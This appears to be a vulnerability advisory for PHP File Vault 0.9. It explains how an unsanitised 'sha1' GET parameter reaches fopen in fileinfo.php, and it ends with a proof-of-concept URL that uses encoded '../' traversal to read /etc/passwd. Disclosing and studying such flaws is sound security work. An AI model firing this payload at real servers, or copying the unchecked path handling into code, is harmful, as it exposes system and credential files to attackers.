PHP File Vault 0.9 - Directory Traversal



EKU-ID: 5743 CVE: OSVDB-ID:
Author: N_A Published: 2016-07-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty
==================================================================================
 
 
Discovered by N_A, N_A[at]tutanota.com
======================================
 
 
 
 
Description
===========
 
 
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.
 
https://sourceforge.net/projects/php-file-vault
 
 
 
Vulnerability
=============
 
 
The vulnerability exists within the fileinfo.php file of the package:
 
 
A A A  if (empty($_GET['sha1'])) die("sha1 is required to get file info");
A A A  $sha1 = trim($_GET['sha1']);
 
 
the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to
the fopen() function within PHP:
 
 
 
A A A  A A A  function parseFileInfo($fi) {
A A A  A A A  $fh = fopen($fi,'r');
A A A  A A A  $fname = trim(fgets($fh));
A A A  A A A  fclose($fh);
A A A  A A A  return array($fname);
A A A  A A  }
 
 
 
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:
 
A A A  A A A  if (!is_readable(FI.$sha1)) die("cannot read file info!");
A A A  A A A  list($fname) = parseFileInfo(FI.$sha1);
 
A A A  A A A  readfile('head.html');
 
A A A  A A A  if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
 
 
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
 
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
 
 
Proof Of Concept
================
 
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd